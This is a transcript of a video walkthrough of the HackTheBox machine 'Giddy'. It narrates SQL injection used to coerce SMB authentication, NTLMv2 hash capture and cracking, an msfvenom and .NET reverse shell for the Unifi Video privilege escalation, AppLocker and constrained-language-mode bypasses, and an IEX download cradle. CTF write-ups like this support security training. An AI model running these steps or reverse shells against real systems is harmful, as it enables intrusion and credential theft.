What's going on YouTube? This is IppSec. I'm doing Giddy from HackTheBox, and apologies ahead of time if this video feels rushed. Literally, as soon as I finish recording this, I'm going to bed, waking up, going to the airport, and then beginning vacation. So if it feels rushed, it is. What I remember about this box is it had a SQL injectable web service, and that database was MS-SQL. You could trick that database into accessing a file on a SMBShare that you control. And when you do that, you can steal the NTLM v2 hash. You crack that hash, you get access to PowerShell web services, and then from there, you notice that the Unifi Video Service is installed, and it's an old version. And the specific version you have, when you stop the service, it attempts to run TaskKill.exe out of its directory, which you have write access to. So you can just drop a executable, stop the service, and then executes that executable, and you get a shell. So let's just jump on in. As always, we're going to start off with the nmap with -sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it Giddy, and then the IP address, which is 10.10.10.104. This can take some time to run, so I've already ran it. Looking at the results, we have 3 ports are open. The first port is HTTP on port 80. Its banner is Microsoft IIS HTTPD 10.0, so we can guess this is going to be a Windows 2016 server. The HTTP title of the page is just IIS Windows Server, so nothing too interesting there. On port 443, we do have HTTPS. It's the same exact server banner, and the SSL cert has the common name set to PowerShell Web Access Test Site. So this is a bit interesting. It looks like it's just a PowerShell site, maybe different than this port 81. And then on 3389, we have RDP, and we see the cert is saying the common name is Giddy, which is going to be the host name of this box. And then we also have the clock skew of the box being 4 minutes behind us. So the very first thing I want to do is go in my host file and add a entry for 10.10.10.104, and we'll call this Giddy because that is what the remote desktop cert had told us. So let's go over to Firefox and do HTTPS 10.10.10.104, and I also just want to go to 10.10.10.104 on port 80. We see a picture of a dog. If we copy the link location, oh wait, that's just going to a IIS page. So don't understand what's going on there. Looking at the page source, we see it's just giddy.jpg and a link. And then HTTPS is doing the same exact thing. If we want to, we can view information about this certificate and see if there's anything of interest. We have the common name as Burp told us, and it doesn't really look like there's anything too interesting. I was wondering if it had any more information confirming the host name of this box as like Giddy, and maybe something like the domain name if this is on .htb or something, but nothing there. So let's just set up a dirbuster, so we always have something going on in the background. I said dirbuster, but I normally use gobuster. So do gobuster-h to pull up the list. We want -w for the word list, so user share word list dirbuster, then directory list 2.3 medium is what I generally use, and then -u for URL http 10.10.10.104, and we could do -x ASP and like ASPX because we assume this is going to be a IIS server, and those are common extensions, but I just want to find directories, so I'm not going to specify those just yet. And we can do -t for threads and set this to 30, which is 3 times the default. So let this run. We get a hit on /remote. So let's go over and check what /remote is. So let's see. Does 10.10.10.104? It does redirect. So 10.10.10.104 on port 80 redirects us to HTTPS. If we go to /remote, we get Windows PowerShell Web Access and our username, password, and computer name, and then we can sign in. We don't have any of this information, so there's nothing really for us to do. We can attempt to brute force something, but I really hate brute forcing Windows just because lockouts are so common. So going back to gobuster, seeing if that ever does finish. I guess we can do some things while gobuster is running, like let's save this image. And then we'll copy the image into a current directory and see if maybe the image has any data. So cp downloads, giddy.jpg, and then we can do exif tool Giddy. We don't see any metadata, strings on Giddy, hex dump, steg hide. Do I have it? I don't even have it installed, so I won't be bothering with doing that. Binwalk it, see if there's anything else in this. Doesn't look like it. So let's go back over to gobuster, and we have a directory /mvc. So I'm going to go to /mvc and see what this is. It's taking a little while to load. And it looks like we have a ASP.NET application. And we just see product name. If we click on various things, about, nothing there. Contact, nothing really there. Search term, let's search for test. And 0 products found. So if we search for caps, see, we have 3 products found. If we search for caps with a apostrophe, we get a error. So server error in MVC application. So let's try a comment. So I think it's just 2 dashes maybe. And we no longer get an error. So this produces a SQL error. This does not, because the syntax is something like select stir from items where name is like test. And what we did is we just put that apostrophe in, and then we can put stuff here. But however, the server automatically puts that other apostrophe, so that creates an error in the SQL syntax. So what we did is we put test and then a comment. So now this apostrophe that the server puts in means nothing. So we have a SQL injection. We can test other places. Let's try looking at chains. We see the ID for each item is in this, so we can try the same exact thing. And it looks like we have SQL injection in the ID as well. So do 5, we get that. And I'm going to guess because this is a integer number, it's not encased in quotes. So that's why when we do a single quote here with the comment, we're getting an error message. But if we just do a flat out comment, we don't get anything. So looks like we have 2 different SQL injections. Since I don't know if either of them will show us output. Maybe this one will. And let's just try. So we can do union select 1 error. Let's just send this over to burp so we can do this a bit quicker. So go to burp suite, intercept is on, resend. Let's accept the cert warning. Maybe this isn't the easier one to do, saying all this junk. Go to repeater, click go. I really hate ASP applications. Let's see. View state. Let's try this one last time. And I may just do the one that's in the URL because that's easier to read. So intercept on, click search. Let's see, redirect, anti-CSRF token. Okay, search terms down there. So we'll click go. We have 9,031 bytes. Click go again. Okay, 9,031 bytes. Since I saw this cross-site scripting token, I wanted to make sure my query would work multiple times. So I'm going to try union select 1, add the comment. And let's see, all queries combined using union must have equal number. So let's do 1, 2. Click go. 1, 3. Click go. 4. And we're just trying to get it to where we no longer see this error message. So we'll try comma 5, comma 6, comma 7. And now this is getting a bit ridiculous. So let's go and try another area. Or let's actually send this into SQLMap. So we'll copy this to file. We don't want Oz, we want Giddy. And we'll call this search.request. So let's go into search.request. The only thing I want to do is remove this. And I'm just going to put a star to tell SQLMap to inject there. So let's do SQLMap-r search.request. It found the inject marker. And let's just keep proceeding with assuming everything. So while that runs, let's go and play with the other SQL injection. So I can go back to burp, proxy, intercept off. Let's go to home, click here, and then let's verify again, put a comment. That's good. If we put a single quote, we get an error message. So let's go back to burp, turn intercept on, refresh this, and we'll send this one over to repeater and play with this. So we'll do 27 and then do union select 1, 2, 3, 4, 5, and we're getting about the same thing, which is annoying. So I'm not going to play with union selects anymore. We found it is vulnerable. This is doing something. Let's try --dbms, because it says it can't fingerprint the backend database management, and we're going to assume this is MSQL. So it found stacked queries, and it found time-based blind. So I'm doing a dump to dump. Well, I thought it would dump. Resumed. Backend is not a Microsoft SQL server. You lie. Let's see. Is there a force? DBMS. Try this. And we'll see if that actually does work. But we can go back to burp, or let's go to Firefox, turn burp off, and let's do MSQL SQL injection cheat sheet and see what this brings. So scrolling down, there are normally two things I really want to do, and since it did say we have stacked queries, it makes it a little easy to do. So we want to try command execution. So let's try inserting these. So go back to burp. We can just do a semicolon. And that is ugly. So I guess it did not like how it pasted. Is there like a paste text option? That was wrongly pasted. So while we go, let's try putting this back. I have no idea what happened there. I think I just pasted something I shouldn't have. So this works. Copy request to file, and we'll call this id.request, and do the same thing in SQLMap. So put it here, and maybe this one will be a bit easier for SQLMap to inject than the last one. Okay, I should have done -batch so it doesn't ask me anything, but let's go on, and if we go back to Firefox, since it's saying it's not SQL or Microsoft SQL, I want to try one thing. We'll try comments this way, because I think this is a bit unique to MSQL, how it does the comments with /star. So that'll be an easy way to kind of verify we're on this. So we'll do comment, please subscribe, comment, click go, and does not error. So we'll put junk at the end of that, and we get an error message. So we know /star is a valid comment, which also leans towards MSQL. So let's go back and try to enable the xpcmd shell. So that's copied. Let's go into terminal. Let's see. The backend database is Microsoft SQL. So this one, it can actually fingerprint it correctly. And I'm going to do --batch so it doesn't ask me everything. And I'm pasting the stuff in here so it begins to be a bit more ASCII so we don't copy and get all that junk we did before. So copy this, go to burp, and we still got the junk. So just delete that. Let's see, xpcmd shell net user, and then comment. Highlight, Control U, click go. We didn't get an error message, so that's good. Let's try, let's see, set this. I think we need --priv. Or is that a comment? I don't come with Microsoft SQL databases that often. I know Tally probably does something a bit better, but I think if we do all this, we'll end up, it won't work anyways. Try this, then reconfigure. And then, let's see. Just try, whoops. xpcmd shell, who am I? Click go. Does not like the space. Invalid syntax near xpcmd shell. We do exec. Don't get anything, so we can try pinging ourselves. So we can do ping 10.10.14.3. And then tcp dump -i ton 0 icmp. Click go. Go back here, and we're not getting any output. So chances are, that was odd. Maybe we did get output. Click go. I did -n to not show DNS. Okay, so, yep, no data. Sometimes if you do TCP dump and you don't specify -n, if it tries to do lookups on DNS, your output gets lagged. So that's why I went back and tried it with -n. So let's go and try a file. So let's see. I don't think this is the cheat sheet I want. Let's go back. I want to do xp directory. So this is just a different one. Command execution. We can try this one. It has exact master DBO, so specifying a bit more before xpcmd shell. So just to verify this, if I could highlight, there we go. TCP dumps running. Not seeing any information. So I want directory. XP directory. So this is the one I want. And it's a bit odd. So copy this, and we will do it here so it's a bit easier to follow first. So we're going to declare the variable q, and we're going to say it's a string for 200 characters, and that's going to be 1010 14 3 backslash, and it can be any folder. Please subscribe, and it's 1010 14 3 because that should be the host name of, or not the host name, the IP address of my box. And then going back to this, we just want to exec this. We'll see if we can browse files. So declaring the variable, setting the variable, then doing a xp directory on the variable. So let's put this in our query, paste that in, highlight everything, convert it to URL, click go. Internal server error. That was odd. Let's do nclvnp 445 to see if we're connecting. Does not look like it. I don't know if I have a comment at the end of this. I can't tell because that HTML. So let's Control-Shift-U. So declare queue, set queue, exec, and then comment. That should work. Ten 14 3. Please subscribe. Give it a file name. Maybe change these double quotes to single quotes. Maybe there's some weird like escaping with double quotes we'd have to do. And now the server's not responding. And we actually get data back, which is good. So we have the server attempting to connect to us over port 445. So what we want to do is set up responder. And we're going to allow it to authenticate to us and then try to steal the hash it authenticates to us with. So responder-i ton 0. And then let's send this request again. Actually, before we do, I want to do a double quote and see if it was some weird escaping thing with backscapes. So every time there's a backslash, I'm going to double it up and see if it works with double quotes. Nope. So this just wants single quotes. So let's do this again. Put a single quote here. Click go. Go back. And when the server connects to us, it's going to send us the NTLM v2 hash, which responder will display. And NTLM v2 uses the username and computer name as part of the salting mechanism. So the hash actually does include that, unlike most hashes. So let's copy everything, go into my Kraken, and go into the hashcat folder. That's hashes, Giddy.ntlmv2. Paste the hash. And then let's do /hashcat-h grep-i ntlm. We see ntlm v2 is 5600. So hashcat-m 5600 hash is Giddy. And then we'll do opt word list rocku.txt. And if you don't have the hashcat, I didn't recommend installing it on your host OS, not in a VM, because VMs make it go slower. So we did get it cracked, and we have the password as XNNW06272K7X. No idea why that's in the rocku. That is definitely an odd password that's not a keyboard walk or something, so not sure what that is, but we'll go and try this and that Windows PowerShell remote thing. So we'll try the username as Stacy, paste the password, computer name as Giddy, sign in. Let's not save this. And we can't establish connection. So let's try the username as Giddy \Stacy, paste this in, click sign in, and we get a PowerShell prompt. So a lot of times Windows likes the domain and then the username. If there's no domain, the domain is the computer name or the workgroup name. So we get a PowerShell prompt as Stacy, and we are in the documents folder. If we do a dir and go to submit, we have Unifi video, which is odd. And this is actually a hint that it is the privesc. If we go back to Kali, do search exploit Unifi, and we have Unifi video local privilege escalation. So let's search exploit -m to mirror this, and then we can look at this text file and see what the details are. And after we do all this, then we'll spend a bit more time and do other cool things on this box. But let's see. Upon starting and stopping the service, it tries to load and execute a file at c:\program data \unifi video /taskkill. However, the file doesn't exist, and if we can write to that directory, then we can get that file. So let us do that. It's not telling us how to start and stop the service, but let's go back into PowerShell, and it wanted us go into cd program data. It's taking a while to run this command. This is odd. Let's refresh this page. Leave the page. One of this box just went down. Ping 10.10.10.104. And it looks like the box is down or my VPN's down, so I'm going to pause the video, restore connection, and then we will resume. So I can now talk to the box again. Let's go back to Firefox. And are we still connected? It looks like we are. So cd \cd program data. And then we want to go into Unifi video. And then see if we can just write to this directory. We see there is no TaskKill. So if we do echo please subscribe to test write, do a dir, and we can see we can write to this directory. So it wants us to write a file called TaskKill.exe. So let us try creating that. So we'll do msf venom -p for payload, Windows Meterpreter reverse TCP, lhost is equal to 10.10.14.3. Lport will do 9001 -f for format, exe, o for output, and we'll call this met.exe. Just realized as I typed that, we probably should have called it TaskKill.exe. But let msfnum create that file. While we do that, let's launch Metasploit with msfdb run. And then we'll do impacket SMB server. And we'll say files pwd. So what this does, it sets up a SMB server. We have \files as a directory or a share, and this does the current working directory. So let's set up the listener. So use multi-handler listeners. That's not it. Use exploit multi-handler. That's what it is. And then we can do set lhost 10.10.14.3, set payload to be Windows Meterpreter reverse TCP, and set lport to be 9001. Run this. And if we go back to this PowerShell window, we can try xcopy 10.10.14.3 / what I call it test. I call it files. And then met.exe to this directory. We should see it connect so it can copy a file. We got one file copied. If we do a dir, we can see met.exe. So let's move this to TaskKill.exe because that's what the CVE said to do. And we see Windows Defender has stopped us. So what I'm going to do is go into a Windows VM and compile a .NET reverse shell, just so we don't have to worry about Windows Defender. So let's go over to Google and just Google .NET reverse shell. Go to this very first result, and let's go and download this. So open up Visual Studio. And while this loads, there's one thing we have to do. Let's check what .NET version we're on. So if we do dir c:\Windows Microsoft.NET, I think it's framework 64. What's in this directory? We see version 4.0. So that's going to be everything I compile it to. So v4. Yeah, so we're going to compile to .NET 4.0. Let's switch over to my Windows VM. New project. We want a console application. Call it RevShell. Then go to program.cs. Not sure what that error was. Open. It should let me type. Did something happen in my Visual Studio? That is new. Let's try this again. Open up Visual Studio. We'll also make sure my disk has space. Have this copied. New project. Okay, let's call this RevShell 2. It's creating the project. Let's see, can I go to 172.16.10.182? Files. Nope. I was just wondering if I could route to my Kali VM from my Windows VM. Does not look like it. Oh, wait. it's not secure and using SMB1. So looks like in packet I may have to do like -SMB2 or something to allow it to mount. But anyways, copy the reverse shell code. Let's change the IP to 10.10.14.3. Change the port to 9002. And everything looks good. So let's save it. And then we have to go to properties. .NET framework. If it compiles for 2, that'll be fine. It just can't be above 4.0. Build failed. Namespace link doesn't exist, so can't use 2. Let's go 4. Build solution. And we have built it. So let me go back to Kali real quick. Is there an SMB2 option I can find quickly? Packet SMB server -SMB2 support. Try this. Oh no, this title bar is not working to switch easily. Click. Go here, full screen. 172.16.10.182 files. Okay. So now we can just drop the file. I wonder if Windows Defender found this as a threat, or it's just other things I have on this machine. Let's do, what is it saved as? C:\users rev shell. Open this. Bin, debug, revshell2.exe. So it looks like I just had something else on this box that Windows Defender finally caught. So copy that to my Kali box. Responder's not happy, but we have confirmed it is there. So let's do psef grep python kill. We still have SQLMap running. We want to kill this. 4438. Okay, start this up again. Netstat ALNP grep for 445 kill-9 4438. Okay. So let's go back to Firefox. Xcopy 10.10.14.3 files, and we called this rev2.exe. Is it /file? Let's get rid of this SMB2 support. Maybe that was stopping it. Let's see, files. Invalid drive specification. revshell2. revshell2.exe. There we go. So we copy the file, and we can now move revshell2.exe to TaskKill.exe. And then we have to find the Unifi Video Service. So we can do git service, and we see the operation failed. So let's try sc query state equals all. That doesn't work. I think it's get wmi object win32_service. See what this does. And we get access denied. So we can't really list the services on this box because of weird permissions. But let's try going into the registry where the services are stored and see if we can find them that way. So we do set location, hkey local machine, system, current control set, services, and we have to close that off. So now we can see our current working directory is a registry hive. And we can just do get child item, period, and we will list all the services. So let's see. Looks like it's listing them in alphabetical order, which is nice. And all we have to do is find Unifi. So let's see. W. So let's do get child item, select name. And now let's scroll up. And we should see Unifi somewhere. Let's see. UA, there's M. Unifi Video Service. So if we try net stop on this, we get access denied. Let's try get child item, Unifi Video Service. And that's not allowed. Unifi where object name is like Unifi. Is that going to work? Nope. Cancel. Let's try that. There we go. Display name is this. So let's try stop service. That. Will this work? Oh, we also should probably be listening on port 9002 in case TaskKill runs. So let's try start service and see if we get a callback. It's waiting for it to start. Okay, let's try stopping it again. It's waiting for it to stop. And I'm guessing once it hits about 4 or 5 stops, that's when it tries to run TaskKill to force kill the service. Still nothing. Let's see. There we go. We got a shell. We do who am I? We're now NT authority/system. So if we go into users, administrator, and then desktop, we have root.txt, which is 32 characters long. So this is going to be the MD5 sum. One of the cool things about this box is it does have AppLocker running on it. So if I just try to execute this TaskKill as my user, let's do /TaskKill.exe. Oh, I have to go back into program data. What was it? Unifi video. If I just try to run TaskKill, I can't because there is a group policy blocking me from doing that. And this is AppLocker, so if we do like AppLocker Bypass and go into this ultimate AppLocker Bypass list, we can go to generic, and there's a bunch of writable directories. And normally AppLocker whitelist anything under like SQL and Windows, and it just is a whitelisted directory. So if we can write to any of these directories, then chances are we can have a bypass. So let's go to Windows, System32, spool drivers color. So let's do it within Firefox. Windows, System32, spool drivers color. And I should have moved it. So let's copy to here. See, do we have it? We do. So if we try to run this, and let's exit this one, we can see this one runs and we are Stacy. The other thing a lot of people would probably run into on this box is if you want to do like power up or something. So let's go to opt powersploit-dev. Let's do privesc. Then we can do Python simple HTTP server on port 80. Simple. I have one extra T. And we tried something like ix new object net.web client download string http 10.10.14.3 powerup.ps1. We see we're in constrained language mode, so we can't do that. If we went back here, we do that TaskKill. Did we exit constrained language mode? Copy. I don't think this is in PowerShell. It's not. Will this shell just do PowerShell? I think it does. So we do ix. Invoke all checks. I don't know if this is doing PowerShell. Who am I? Giddy Stacy. It is. I don't think we're getting standard error. Let's see. Are we hitting? I'm not even running a web service right now. Python M simple HTTP server 80. So I don't think this shell prints standard error because I'm not seeing that error message. But we can see we are not getting a hit back. So we are getting stopped from constrained language mode. So we have to find an escape of constrained language mode if we wanted to do things like this. So I'm going to go back to my Windows VM because I know ultimately I'm going to have to compile a .NET binary. And I really wish I knew why that was such a pain to click on. So let's go back to Internet Explorer, google.com, PowerShell, escape, constrained language mode. And let's just try this GitHub. So download this. Open. Extract. And then with this loaded, the first thing I want to do is change this mode to be .NET probably 4, which it's already at. So we can just build this tool. So build solution. And then we want to navigate to where it is. So bin, debug, let's see. Build, rebuild. I don't think it likes something. But there is a compiled version from 2018. Let's just try changing this to .NET 4. Let's see, primary reference, clean solution, build solution. These are just warnings, so it should still build. Bin, debug. Delete these. Let's see, can we delete all this? Let's skip that one. Build solution. I honestly don't know why that's not building. Properties. .NET 3.5. Okay, it needs to be .NET 4. Build. I think I'll have to take more time and read those error messages. 4.5. Works on 4.5, but I'm not sure if it's going to work on the box. But we can try. Because when it says version 4.0, I think that may be version 4.5. I think they stopped being exact. So let's just copy this. And then I think I stopped the service. So we may have to start the service back up. I should have just done all this in a separate window. We don't need Metasploit anymore. Let's do mpacket SMB server -SMB2. Was it SMB2? SMB2 support. Files pwd. I just accessed that. 172.16.10 files. There we go. So copy this. Let's just rename this to be bypass.exe. And now we can finally go back here. Firefox. You can kill that. Let's go back to a directory where AppLocker is in effect. So I should be able to write the documents. So let's xcopy 10.10.14.3 files bypass.exe. Oh, I forgot to specify location I want to copy to. Let's see. Invalid drive specification. Stop this. Let's get rid of SMB2 support. Not sure why that's causing an error, or if it is. Unless there is bypass.exe there. Net use x 10.10.14.3 files. I'm not sure exactly why I can't copy files out of this. There we go. I'm not sure what I was doing wrong, but did something wrong there. Bypass.exe. We can't execute this. That's good. So let's go Google this real quick. Bypass PowerShell constrained language. Go back here. And it actually uses one of the lol bins of install util. And we got a reverse shell syntax built in. So let's paste this in. The file is actually c:\users stacy documents bypass.exe. The port, let's do 9003. So NC LVNP 9003. And the reverse host is going to be 10.10.14.3. Run this. And if this errors out, it would have been because of this .NET directory. But we can see install util, executed bypass.exe, and it's trying to connect back. And we do have a connection back. So now we can finally go back and try this one last time. So this powerup.ps1. And we see it actually hit our web server. So now we can do invoke all checks. And wait. And all it does is print this error message because we have low permissions. So we did all that work for essentially nothing. So the other thing we could do before we end this video is just examine the PowerShell history files. And before I do that, I just want to do a double verification on constrained language mode. So if we cancel this, does this kill our shell? It did. That's a shame. So let's start the shell again. I'm going to run a command, verify constrained language mode is off, and then we're going to run the command on both other shells. So let's do execution, context, session state, language mode. I thought that was it. Go back here. What did I do wrong? Forgot the dollar. So copy. So we can see full language is allowed here. So let's go back to this, cancel, language mode, we're in constrained language. So now we want to cd into that printer directory. cd backslash, do that again. We're listening on 9002, so we can run TaskKill. This is that .NET shell. So let's copy this and see if it says full language or constrained language. And this will tell us if we were correct about it just not having error messages displayed. Did that not output anything? It did not. So this reverse shell is wonky. Let's do dir, did write temp, has no contents. So I'm not sure what this shell is in. I can't prove it, but we can do this IEX and show it never hits a web server. So we know that just worked. Paste this in, and we don't see another get power up. So I'm going to guess it's in constrained language mode. Actually, wait. PowerShell. And we have to let PowerShell load, because this is a command prompt. I should have known that one. Let's see, is it still running? It is. I should just open a new web session or background one of these so I can do other things at the same time. Because there's one last thing I want to show in the video. Let's do... Who am I? Let's get a prompt back, because I have no clue where this shell is at. So I guess we have to redo this. Start. Okay, this will be the last time I try this. I think I had too much stuff on my clipboard and it freaked the terminal out. Execution context. There we go. Constrained language. So without doing that bypass, we're stuck in constrained language mode. So the very last thing I want to show is there is a PowerShell history file. So we can do git ps read line option history save path. And if we cat this file, we can see PowerShell history, and we can see netstop Unifi Service, execution context, and I believe this is actually from the machine creator because we did not do -force on our stop service. So if we go into this directory, let's go into the directory and see the last time this file was written. So last write time was June 17th, 2018. So yes, this is from the creator leaving some forensic evidence behind. If you saw this file and pulled it, then you would have an idea that it had to do with the Unifi video service that you're exploiting. So hope you enjoyed the video. Take care, guys, and I will see you all next week.